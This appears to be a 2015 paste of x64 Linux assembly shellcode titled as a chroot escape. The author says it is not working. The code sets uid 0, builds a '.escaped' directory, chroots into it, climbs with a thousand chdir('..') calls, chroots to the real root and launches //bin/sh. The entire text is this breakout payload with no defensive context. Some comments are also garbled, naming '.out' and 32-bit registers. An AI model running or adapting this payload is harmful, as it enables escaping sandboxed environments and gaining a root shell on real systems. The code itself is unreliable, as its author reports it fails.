GoodiesHQ

Chroot Escape x64 (Should be working but isn't...)

Oct 26th, 2015
  1. global _start
  2. _start:
  3.     xor rax, rax
  4.     xor rdi, rdi
  5.     xor rsi, rsi
  6.     xor r10, r10
  7.     xor r9, r9
  8.     xor r8, r8
  9.  
  10.     mov al, 69h         ;// Syscall for SETUID
  11.                     ;// RDI is 0 for setuid(0)
  12.     syscall             ;// Call the kernel
  13.  
  14.     xor rax, rax            ;// EAX should be 0 for successful setuid, but it may be -1 on error. This is faster than test/jnz
  15.     mov al, 53h         ;// Syscall for MKDIR
  16.     push rdi            ;// push 0x000000 for null terminator
  17.     mov rdi, 0x646570616373652e ;// ".escaped" in reverse
  18.     push rdi
  19.     mov rdi, rsp            ;// pointer to ".escaped" folder string
  20.     xor rcx, rcx
  21.     mov cx, 755o
  22.     mov rsi, rcx            ;// rwxr-xr-x
  23.     syscall
  24.  
  25.     xor rax, rax
  26.     xor rcx, rcx            ;// O_RDONLY (000000000)
  27.     mov al, 0x2e            ;// Open "." string
  28.     push rax            ;// Push "\x00\x00\x00\x00\x00\x00\x00." onto stack
  29.     mov rdi, rsp            ;// Set RDI to the string pointer
  30.     mov al, 2h          ;// Syscall for open
  31.     syscall
  32.  
  33.     mov r15, rax            ;// Move File Descriptor into R15 for later
  34.     xor rdi, rdi
  35.     push rdi            ;// push 0x000000 for null terminator
  36.     mov rdi, 0x646570616373652e ;// ".escaped" in reverse
  37.     push rdi
  38.     mov rdi, rsp            ;// pointer to ".escaped" folder string
  39.     xor rax, rax
  40.     mov al, 0xa1            ;// Syscall for CHROOT
  41.     syscall
  42.  
  43.     xor rax, rax
  44.     mov rdi, r15            ;// move ".escaped" File Descriptor we saved earlier into RBX
  45.     mov al, 51h         ;// Syscall for FCHDIR
  46.     syscall
  47.    
  48.     xor rax, rax
  49.     mov al, 3h          ;// Syscall for CLOSE
  50.     mov rdi, r15            ;// Move the File Descriptor for ".out" into
  51.     syscall
  52.  
  53.     xor rax, rax
  54.     mov ax, 0x2e2e          ;// move ".." to stack
  55.     push rax
  56.     mov rdi, rsp            ;// EBX now contains a pointer to "..\x00\x00\x00\x00\x00\x00" in human-readable format
  57.     xor r15, r15
  58.     mov r15w, 1000          ;// loop 1000 times
  59.     nop
  60. loop1:  xor rax, rax            ;// return value should always be 0, but just in case...
  61.     mov al, 12          ;// Syscall for CHDIR
  62.     syscall
  63.     dec r15
  64.     test r15, r15
  65.     jnz loop1
  66.  
  67.     xor rcx, rcx
  68.     mov cl, 0x2e            ;// Set ECX to "."
  69.     push rcx            ;// Push "." onto stack
  70.     mov rdi, rsp            ;// Pointer to ".out" folder string
  71.     mov al, 0xa1            ;// Syscall for CHROOT
  72.     syscall
  73.  
  74.     nop
  75.  
  76.     xor rax, rax
  77.     push rax
  78.     mov r15, 0x68732f6e69622f2f ;// "hs/nib//" for "//bin/sh" to execute. Don't asume bash or dash just in case.
  79.     push r15
  80.     mov rdi, rsp            ;// Set the char* parameter to the file name //bin/sh
  81.     push rax            ;// push 0x00000000
  82.     mov rdx, rsp            ;// NULL for the Environment...
  83.     push rdi            ;// Push the address of "//bin/sh" for the list of arguments. Executing '//bin/sh //bin/sh'
  84.     mov rsi, rsp
  85.     mov al, 3bh         ;// Syscall for EXECVE
  86.     syscall
  87.  
  88.     xor rax, rax
  89.     xor rdi, rdi
  90.     mov dl, 123d
  91.     mov al, 3ch
  92.     syscall